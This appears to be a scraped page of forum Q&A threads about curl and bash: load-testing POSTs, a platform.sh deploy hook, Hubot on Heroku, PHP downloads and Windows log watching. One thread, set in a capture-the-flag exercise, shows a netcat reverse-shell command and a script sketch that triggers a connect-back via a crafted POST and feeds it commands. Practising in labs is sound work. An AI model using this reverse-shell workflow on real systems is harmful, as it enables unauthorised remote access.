What's the quickest way to create concurrent curl requests? I have an app which accepts POST requests and would like to do some load testing.
I would like to run the following cURL command concurrently, not sequentially:
curl -d "param1=value1¶m2=value2" http://example.com/test
Thanks
How about ApacheBench? You've probably already got it installed.
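Something along these lines should work for your POST (the body file, request count, and concurrency level below are just examples):
# put the POST body from your curl command into a file first
echo "param1=value1&param2=value2" > post.data
# 100 requests total, 10 in flight at a time
ab -n 100 -c 10 -p post.data -T "application/x-www-form-urlencoded" http://example.com/test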
I am not confident, but how about spawning multiple processes in the background?
nohup curl -parameters &
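For example, something rough like this fires off a batch in parallel (reusing the request from the question) and waits for all of them to finish:
# launch 50 requests in the background, then wait for them all
for i in $(seq 1 50); do
  curl -s -o /dev/null -d "param1=value1&param2=value2" http://example.com/test &
done
wait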
For load testing you perhaps need something like multi-threading; you might also want to look into already available tools.
I do this kind of thing (generating concurrent POST requests) with a few small perl scripts I wrote:
http://patrick.net/sprocket/rwt.html
I'm planning to port it to python, but the perl version works pretty well right now.
I'm doing an exercise (basically just a CTF) where we exploit some vulnerable machines. For example, by sending a specially crafted POST request, we can make a machine execute something like
nc -e /bin/bash 10.0.0.2 2546
What I want to do is script my way out of this, to make it easier:
Set up a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) are not the best.
The problem is when I reach step 2. For obvious reasons, I can't start nc -lvp 1234 before sending the POST request, since it blocks. And I'm fairly sure multithreading in bash is not possible (...somebody has probably made it work, though).
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, through netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and using that as a "buffer"?
I know there are a lot of questions, and they can't all be covered with one answer, but I'd like to hear more about how people would do this. Or whether it's completely ridiculous to do in bash.
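Here is a completely untested sketch of the "pipe as buffer" idea I have in mind ($lp and $url as above; /tmp/in, /tmp/out and the setup command are just placeholders):
mkfifo /tmp/in /tmp/out                                  # named pipes act as the "buffer"
nc -lp "$lp" < /tmp/in > /tmp/out &                      # listener in the background, wired to the pipes
exec 3> /tmp/in                                          # keep the write end open for the whole script
cat /tmp/out &                                           # stream whatever comes back to the terminal
sleep 1                                                  # crude: give nc a moment to start listening
curl -X POST "$url" --data "in_command=do_dirty_stuff"   # trigger the connect-back
echo "some_setup_command" >&3                            # scripted input goes to the remote end first
cat >&3                                                  # then hand the user's stdin over as the "shell"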
I'm trying to implement message sending on my platform.sh server. The idea is to use the existing hooks:deploy: hook in the configuration file to make a bash curl call that sends a "Deploy completed" message to an API.
I use a curl snippet that works like a charm on my local machine, though the message is never sent from the server on a new deploy.
I know that the correct interpreter is bash, since the existing example in the platform.sh docs uses bash code. However, the docs indicate that the disk is in read-only mode during this hook; could that be the cause of the issue?
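For reference, the kind of setup I have in mind looks roughly like this in .platform.app.yaml (the API URL and message are placeholders, not my real snippet):
hooks:
    deploy: |
        curl -s -X POST "https://api.example.com/notify" --data "message=Deploy completed"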
Thanks a lot!
~SPJ
For posterity: also note that this may already exist by default in Platform.sh; you can use the webhook integration to get notified of any activity.
$ platform integration:add --type=webhook --url=A-URL-THAT-CAN-RECEIVE-THE-POSTED-JSON
Details on https://docs.platform.sh/administration/integrations/webhooks.html
Hmm, I thought it was irrelevant, but French text with accents in the API parameters was causing the issue...
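In case anyone hits the same thing: one workaround is to let curl percent-encode the text itself (URL and message below are placeholders):
curl -s -X POST "https://api.example.com/notify" --data-urlencode "message=Déploiement terminé"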
Hope this will help others.
~SPJ
I'm running Hubot on Heroku and have connected it to Hipchat.
I'd now like to use Curl to post third-party information to the Hubot, when appropriate.
There are two scripts that seem like the right fit, http-post-say.coffee and http-say.coffee, but I can't get either to work.
http-post-say points to port 8080, which I don't believe will work on Heroku, and http-say simply doesn't post, without any error message.
Both scripts have zero config, and I've successfully deployed several other scripts, so I'm at a loss.
Has anyone successfully used either script in the scenario I've described, or taken a different approach to reach the same goal?
This answer is a bit late.
http-post-say just worked for me. Ignore the port 8080 on Heroku; just use your app URL (app-name.herokuapp.com). The more confusing thing for me was that for the room you need to use the XMPP JID, which looks like 12345_something#conf.hipchat.com. So, to post a message on Heroku, it would look as follows.
curl -X POST http://app-name.herokuapp.com/hubot/say -d message='Hello World' -d room='12345_room_name#conf.hipchat.com'
How should I download a file from an FTP server to my local machine using PHP? Is curl good for this?
You can use wget, or curl, from PHP. Be aware that the PHP script will wait for the download to finish, so if the download takes longer than your PHP max_execution_time, your PHP script will be killed during runtime.
The best way to implement something like this is to do it asynchronously; that way you don't slow down the execution of the PHP script, which is probably supposed to serve a page later.
There are many ways to implement it asynchronously. The cleanest one is probably to use some queue like RabbitMQ or ZeroMQ over AMQP. A less clean one, which works as well, is to write the URLs to download into a file and then implement a cron job that checks this file every minute for new URLs and executes the downloads.
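For the cron variant, a rough sketch (all paths made up) would be a script like this, run from a "* * * * *" crontab entry:
#!/bin/bash
# fetch-queue.sh -- download every URL the PHP script has queued up
QUEUE=/var/spool/download-queue.txt
DEST=/var/downloads
[ -s "$QUEUE" ] || exit 0            # nothing queued, nothing to do
while read -r url; do
    wget -q -P "$DEST" "$url"        # or: curl -s -o "$DEST/$(basename "$url")" "$url"
done < "$QUEUE"
: > "$QUEUE"                         # clear the queue (not safe against concurrent writers)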
just some ideas...
(Briefly, like this question but for Windows servers.)
I have several Win2003 servers running custom application services (C/C++, not Java) that write text-based logs in a custom format.
[2009-07-17 12:34:56.7890]\t INFO\t<ThreadID>\tLog message...
[2009-07-17 12:34:56.7890]\t *WARN\t<ThreadID>\tLog message...
[2009-07-17 12:34:56.7890]\t**ERR \t<ThreadID>\tLog message...
I would like a way to easily and efficiently (over a not-very-fast VPN) "watch" these logs for lines that match a pattern (like tail -f | grep -E on Linux). Ideally the output would be aggregated, not one window/shell per file or per server, and a Windows application would be best, so that I can put it in front of people who are command-line-phobic.
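For reference, the Linux equivalent I have in mind would be roughly this, with service.log standing in for one of the custom log files:
tail -f service.log | grep -E '\*WARN|\*\*ERR'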
Any recommendations?
Try using BareTail.
Splunk, from www.splunk.com, is the way to go. It is free and does exactly what you are asking for.